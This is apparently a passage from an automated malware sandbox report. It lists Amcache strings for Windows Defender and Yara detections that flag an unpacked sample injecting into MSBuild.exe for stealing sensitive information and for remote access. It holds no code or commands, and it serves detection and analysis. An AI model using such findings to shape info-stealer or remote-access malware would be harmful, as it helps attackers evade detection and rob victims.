Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 0.2.5rVhexjLCx.exe.5adad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5rVhexjLCx.exe.5adad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5rVhexjLCx.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1820269495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1958245756.00000000005AD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7072, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match File source: 0.2.5rVhexjLCx.exe.5adad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5rVhexjLCx.exe.5adad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5rVhexjLCx.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1820269495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1958245756.00000000005AD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7072, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP